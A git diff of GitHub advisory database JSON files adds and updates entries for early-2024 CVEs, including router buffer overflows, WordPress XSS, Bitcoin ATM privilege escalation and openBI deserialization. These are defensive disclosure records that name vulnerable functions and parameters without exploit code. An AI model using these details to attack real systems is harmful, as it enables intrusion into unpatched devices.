"https://patchstack.com/database/vulnerability/cbxgooglemap/wordpress-cbx-map-for-google-map-openstreetmap-plugin-1-1-11-cross-site-scripting-xss-vulnerability-2?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T18:15:49Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4vwj-x32h-m4vj/GHSA-4vwj-x32h-m4vj.json b/advisories/unreviewed/2024/01/GHSA-4vwj-x32h-m4vj/GHSA-4vwj-x32h-m4vj.json index adc9e44463e24..2daac5f23ec8c 100644 --- a/advisories/unreviewed/2024/01/GHSA-4vwj-x32h-m4vj/GHSA-4vwj-x32h-m4vj.json +++ b/advisories/unreviewed/2024/01/GHSA-4vwj-x32h-m4vj/GHSA-4vwj-x32h-m4vj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4vwj-x32h-m4vj", - "modified": "2024-01-25T18:30:51Z", + "modified": "2024-02-08T15:30:26Z", "published": "2024-01-25T18:30:51Z", "aliases": [ "CVE-2024-0822" @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0822" }, + { + "type": "WEB", + "url": "https://github.com/oVirt/ovirt-engine/pull/914" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2024-0822" @@ -32,7 +36,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-1390" + "CWE-1390", + "CWE-287" ], "severity": "CRITICAL", "github_reviewed": false, diff --git a/advisories/unreviewed/2024/01/GHSA-4wm4-8487-w6cr/GHSA-4wm4-8487-w6cr.json b/advisories/unreviewed/2024/01/GHSA-4wm4-8487-w6cr/GHSA-4wm4-8487-w6cr.json new file mode 100644 index 0000000000000..a29d050bd2fed --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-4wm4-8487-w6cr/GHSA-4wm4-8487-w6cr.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4wm4-8487-w6cr", + "modified": "2024-01-29T18:31:53Z", + "published": "2024-01-29T18:31:53Z", + "aliases": [ + "CVE-2024-1016" + ], + "details": "A vulnerability was found in Solar FTP Server 2.1.1/2.1.2. It has been declared as problematic. This vulnerability affects unknown code of the component PASV Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252286 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1016" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252286" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252286" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T18:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-4x9c-j993-gcjj/GHSA-4x9c-j993-gcjj.json b/advisories/unreviewed/2024/01/GHSA-4x9c-j993-gcjj/GHSA-4x9c-j993-gcjj.json index 313c6d5076cc1..4d8ec865a4322 100644 --- a/advisories/unreviewed/2024/01/GHSA-4x9c-j993-gcjj/GHSA-4x9c-j993-gcjj.json +++ b/advisories/unreviewed/2024/01/GHSA-4x9c-j993-gcjj/GHSA-4x9c-j993-gcjj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-4x9c-j993-gcjj", - "modified": "2024-01-24T00:30:32Z", + "modified": "2024-01-31T18:31:23Z", "published": "2024-01-24T00:30:32Z", "aliases": [ "CVE-2023-31654" ], "details": "Redis raft master-1b8bd86 to master-7b46079 was discovered to contain an ODR violation via the component hiredisAllocFns at /opt/fs/redisraft/deps/hiredis/alloc.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -31,7 +34,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-23T22:15:16Z" diff --git a/advisories/unreviewed/2024/01/GHSA-54p6-86fq-2pg8/GHSA-54p6-86fq-2pg8.json b/advisories/unreviewed/2024/01/GHSA-54p6-86fq-2pg8/GHSA-54p6-86fq-2pg8.json new file mode 100644 index 0000000000000..0fd930e295dff --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-54p6-86fq-2pg8/GHSA-54p6-86fq-2pg8.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54p6-86fq-2pg8", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-0674" + ], + "details": "Privilege escalation vulnerability in Lamassu Bitcoin ATM Douro machines, in its 7.1 version, which could allow a local user to acquire root permissions by modifying the updatescript.js, inserting special code inside the script and creating the done.txt file. This would cause the watchdog process to run as root and execute the payload stored in the updatescript.js.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0674" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269", + "CWE-281" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-54pg-h955-7f6w/GHSA-54pg-h955-7f6w.json b/advisories/unreviewed/2024/01/GHSA-54pg-h955-7f6w/GHSA-54pg-h955-7f6w.json new file mode 100644 index 0000000000000..17859e204d4a5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-54pg-h955-7f6w/GHSA-54pg-h955-7f6w.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-54pg-h955-7f6w", + "modified": "2024-01-29T03:30:18Z", + "published": "2024-01-29T03:30:18Z", + "aliases": [ + "CVE-2024-0992" + ], + "details": "A vulnerability was found in Tenda i6 1.0.0.9(3857) and classified as critical. This issue affects the function formwrlSSIDset of the file /goform/wifiSSIDset of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252257 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0992" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/Tenda-i6-has-stack-buffer-overflow-vulnerability-in-formwrlSSIDset-f0e8be2eb0614e03a60160b48f8527f5?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252257" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252257" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121", + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-554m-v42f-hcq9/GHSA-554m-v42f-hcq9.json b/advisories/unreviewed/2024/01/GHSA-554m-v42f-hcq9/GHSA-554m-v42f-hcq9.json new file mode 100644 index 0000000000000..01b341acad305 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-554m-v42f-hcq9/GHSA-554m-v42f-hcq9.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-554m-v42f-hcq9", + "modified": "2024-01-31T15:30:20Z", + "published": "2024-01-31T15:30:20Z", + "aliases": [ + "CVE-2023-5992" + ], + "details": "A vulnerability was found in OpenSC where PKCS#1 encryption padding removal is not implemented as side-channel resistant. This issue may result in the potential leak of private data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5992" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-5992" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2248685" + }, + { + "type": "WEB", + "url": "https://github.com/OpenSC/OpenSC/wiki/CVE-2023-5992" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T14:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-555g-cg2q-wmc3/GHSA-555g-cg2q-wmc3.json b/advisories/unreviewed/2024/01/GHSA-555g-cg2q-wmc3/GHSA-555g-cg2q-wmc3.json new file mode 100644 index 0000000000000..7388d61cc2130 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-555g-cg2q-wmc3/GHSA-555g-cg2q-wmc3.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-555g-cg2q-wmc3", + "modified": "2024-02-03T00:31:33Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-51840" + ], + "details": "DoraCMS 2.1.8 is vulnerable to Use of Hard-coded Cryptographic Key.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51840" + }, + { + "type": "WEB", + "url": "https://github.com/doramart/DoraCMS/issues/262" + }, + { + "type": "WEB", + "url": "https://github.com/doramart/DoraCMS" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51840.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-55jq-jhw2-2vmp/GHSA-55jq-jhw2-2vmp.json b/advisories/unreviewed/2024/01/GHSA-55jq-jhw2-2vmp/GHSA-55jq-jhw2-2vmp.json new file mode 100644 index 0000000000000..172863dba999c --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-55jq-jhw2-2vmp/GHSA-55jq-jhw2-2vmp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-55jq-jhw2-2vmp", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-22159" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WOLF – WordPress Posts Bulk Editor and Manager Professional allows Reflected XSS.This issue affects WOLF – WordPress Posts Bulk Editor and Manager Professional: from n/a through 1.0.8.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22159" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/bulk-editor/wordpress-wolf-wordpress-posts-bulk-editor-and-manager-professional-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T19:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-567x-h4g5-2gwq/GHSA-567x-h4g5-2gwq.json b/advisories/unreviewed/2024/01/GHSA-567x-h4g5-2gwq/GHSA-567x-h4g5-2gwq.json index 97a2c40b4a8f7..750b5c55b9f7f 100644 --- a/advisories/unreviewed/2024/01/GHSA-567x-h4g5-2gwq/GHSA-567x-h4g5-2gwq.json +++ b/advisories/unreviewed/2024/01/GHSA-567x-h4g5-2gwq/GHSA-567x-h4g5-2gwq.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-567x-h4g5-2gwq", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T15:30:23Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51890" ], "details": "An infinite loop issue discovered in Mathtex 1.05 and before allows a remote attackers to consume CPU resources via crafted string in the application URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-835" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-57w7-wm2r-3f6f/GHSA-57w7-wm2r-3f6f.json b/advisories/unreviewed/2024/01/GHSA-57w7-wm2r-3f6f/GHSA-57w7-wm2r-3f6f.json index 4d26ae3a0a099..5cfb7cf21bdff 100644 --- a/advisories/unreviewed/2024/01/GHSA-57w7-wm2r-3f6f/GHSA-57w7-wm2r-3f6f.json +++ b/advisories/unreviewed/2024/01/GHSA-57w7-wm2r-3f6f/GHSA-57w7-wm2r-3f6f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-57w7-wm2r-3f6f", - "modified": "2024-01-24T18:31:01Z", + "modified": "2024-02-05T15:30:23Z", "published": "2024-01-24T18:31:01Z", "aliases": [ "CVE-2023-51889" ], "details": "Stack Overflow vulnerability in the validate() function in Mathtex v.1.05 and before allows a remote attacker to execute arbitrary code via crafted string in the application URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-24T18:15:08Z" diff --git a/advisories/unreviewed/2024/01/GHSA-595j-mfvm-f4gx/GHSA-595j-mfvm-f4gx.json b/advisories/unreviewed/2024/01/GHSA-595j-mfvm-f4gx/GHSA-595j-mfvm-f4gx.json index 0b9b652f716e6..1b5ba017a35f2 100644 --- a/advisories/unreviewed/2024/01/GHSA-595j-mfvm-f4gx/GHSA-595j-mfvm-f4gx.json +++ b/advisories/unreviewed/2024/01/GHSA-595j-mfvm-f4gx/GHSA-595j-mfvm-f4gx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-595j-mfvm-f4gx", - "modified": "2024-01-26T00:30:26Z", + "modified": "2024-02-01T00:31:28Z", "published": "2024-01-26T00:30:26Z", "aliases": [ "CVE-2023-51833" ], "details": "A command injection issue in TRENDnet TEW-411BRPplus v.2.07_eu that allows a local attacker to execute arbitrary code via the data1 parameter in the debug.cgi page.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,9 +32,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-77" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-25T22:15:07Z" diff --git a/advisories/unreviewed/2024/01/GHSA-597m-g6ch-mrf9/GHSA-597m-g6ch-mrf9.json b/advisories/unreviewed/2024/01/GHSA-597m-g6ch-mrf9/GHSA-597m-g6ch-mrf9.json new file mode 100644 index 0000000000000..c63120cac668a --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-597m-g6ch-mrf9/GHSA-597m-g6ch-mrf9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-597m-g6ch-mrf9", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-0676" + ], + "details": "Weak password requirement vulnerability \n\nin Lamassu Bitcoin ATM Douro machines, in its 7.1 version\n\n, which allows a local user to interact with the machine where the application is installed, retrieve stored hashes from the machine and crack long 4-character passwords using a dictionary attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0676" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-lamassu-bitcoin-atm-douro-machines" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-521" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json b/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json index 4831bb25b798b..c3245768ecbba 100644 --- a/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json +++ b/advisories/unreviewed/2024/01/GHSA-5g36-x562-44f9/GHSA-5g36-x562-44f9.json @@ -28,6 +28,10 @@ { "type": "WEB", "url": "https://github.com/rear/rear/pull/3123" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/02/msg00003.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/01/GHSA-5g3r-g2mw-w853/GHSA-5g3r-g2mw-w853.json b/advisories/unreviewed/2024/01/GHSA-5g3r-g2mw-w853/GHSA-5g3r-g2mw-w853.json index 427ae3d352c45..3d157e8dd6500 100644 --- a/advisories/unreviewed/2024/01/GHSA-5g3r-g2mw-w853/GHSA-5g3r-g2mw-w853.json +++ b/advisories/unreviewed/2024/01/GHSA-5g3r-g2mw-w853/GHSA-5g3r-g2mw-w853.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-5g3r-g2mw-w853", - "modified": "2024-01-26T09:30:22Z", + "modified": "2024-01-30T00:30:29Z", "published": "2024-01-26T09:30:22Z", "aliases": [ "CVE-2023-48128" ], "details": "An issue in UNITED BOXING GYM mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } ], "affected": [ @@ -27,7 +30,7 @@ "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-01-26T07:15:57Z" diff --git a/advisories/unreviewed/2024/01/GHSA-5gr6-jf2g-hh79/GHSA-5gr6-jf2g-hh79.json b/advisories/unreviewed/2024/01/GHSA-5gr6-jf2g-hh79/GHSA-5gr6-jf2g-hh79.json new file mode 100644 index 0000000000000..ec7f3e21424f9 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5gr6-jf2g-hh79/GHSA-5gr6-jf2g-hh79.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5gr6-jf2g-hh79", + "modified": "2024-01-31T18:31:25Z", + "published": "2024-01-31T18:31:25Z", + "aliases": [ + "CVE-2024-0833" + ], + "details": "In Telerik Test Studio versions prior to \n\nv2023.3.1330, a privilege elevation vulnerability has been identified in the applications installer component.  In an environment where an existing Telerik Test Studio install is present, a lower privileged user has the ability to manipulate the installation package to elevate their privileges on the underlying operating system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0833" + }, + { + "type": "WEB", + "url": "https://docs.telerik.com/teststudio/knowledge-base/product-notices-kb/legacy-installer-vulnerability" + }, + { + "type": "WEB", + "url": "https://www.telerik.com/teststudio" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T16:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5h2x-6j9f-vr5g/GHSA-5h2x-6j9f-vr5g.json b/advisories/unreviewed/2024/01/GHSA-5h2x-6j9f-vr5g/GHSA-5h2x-6j9f-vr5g.json new file mode 100644 index 0000000000000..aa101c09dd2a5 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5h2x-6j9f-vr5g/GHSA-5h2x-6j9f-vr5g.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5h2x-6j9f-vr5g", + "modified": "2024-01-31T21:31:03Z", + "published": "2024-01-31T21:31:03Z", + "aliases": [ + "CVE-2024-1113" + ], + "details": "A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadUnity of the file /application/index/controller/Unity.php. The manipulation of the argument file leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252471.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1113" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/hPSx8li8LFfJ" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252471" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252471" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-31T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5jgq-vcw8-3624/GHSA-5jgq-vcw8-3624.json b/advisories/unreviewed/2024/01/GHSA-5jgq-vcw8-3624/GHSA-5jgq-vcw8-3624.json new file mode 100644 index 0000000000000..f7d8bd6c7a323 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5jgq-vcw8-3624/GHSA-5jgq-vcw8-3624.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jgq-vcw8-3624", + "modified": "2024-01-29T15:30:26Z", + "published": "2024-01-29T15:30:26Z", + "aliases": [ + "CVE-2024-0997" + ], + "details": "A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. Affected by this issue is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0997" + }, + { + "type": "WEB", + "url": "https://jylsec.notion.site/TOTOLINK-N200RE-has-stack-buffer-overflow-vulnerability-in-setOpModeCfg-9faac02b13d84bd3b7fe84aab68c7add?pvs=4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252266" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252266" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-29T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5m9g-m2vj-47r4/GHSA-5m9g-m2vj-47r4.json b/advisories/unreviewed/2024/01/GHSA-5m9g-m2vj-47r4/GHSA-5m9g-m2vj-47r4.json new file mode 100644 index 0000000000000..0ad115e45e815 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5m9g-m2vj-47r4/GHSA-5m9g-m2vj-47r4.json @@ -0,0 +1,54 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5m9g-m2vj-47r4", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-0564" + ], + "details": "A flaw was found in the Linux kernel's memory deduplication mechanism. The max page sharing of Kernel Samepage Merging (KSM), added in Linux kernel version 4.4.0-96.119, can create a side channel. When the attacker and the victim share the same host and the default setting of KSM is \"max page sharing=256\", it is possible for the attacker to time the unmap to merge with the victim's page. The unmapping time depends on whether it merges with the victim's page and additional physical pages are created beyond the KSM's \"max page share\". Through these operations, the attacker can leak the victim's page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0564" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2024-0564" + }, + { + "type": "WEB", + "url": "https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1680513" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258514" + }, + { + "type": "WEB", + "url": "https://link.springer.com/conference/wisa" + }, + { + "type": "WEB", + "url": "https://wisa.or.kr/accepted" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-203" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5mh9-hrrq-46qr/GHSA-5mh9-hrrq-46qr.json b/advisories/unreviewed/2024/01/GHSA-5mh9-hrrq-46qr/GHSA-5mh9-hrrq-46qr.json new file mode 100644 index 0000000000000..525427be673fd --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5mh9-hrrq-46qr/GHSA-5mh9-hrrq-46qr.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mh9-hrrq-46qr", + "modified": "2024-01-30T15:30:22Z", + "published": "2024-01-30T15:30:22Z", + "aliases": [ + "CVE-2024-1032" + ], + "details": "A vulnerability classified as critical was found in openBI up to 1.0.8. Affected by this vulnerability is the function testConnection of the file /application/index/controller/Databasesource.php of the component Test Connection Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252307.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1032" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/6ISYe2urjlkI" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252307" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252307" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-01-30T14:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/01/GHSA-5mwr-c944-45q4/GHSA-5mwr-c944-45q4.json b/advisories/unreviewed/2024/01/GHSA-5mwr-c944-45q4/GHSA-5mwr-c944-45q4.json new file mode 100644 index 0000000000000..e0448f2bb2a27 --- /dev/null +++ b/advisories/unreviewed/2024/01/GHSA-5mwr-c944-45q4/GHSA-5mwr-c944-45q4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5mwr-c944-45q4", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-01-31T12:30:17Z", + "aliases": [ + "CVE-2024-22287" + ], + "details": "Cross-Site Request Forgery (CSRF) vulnerability in Luděk Melichar Better Anchor Links allows Cross-Site Scripting (XSS).This issue affects Better Anchor Links: from n/a through 1.7.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22287" + }, + { + 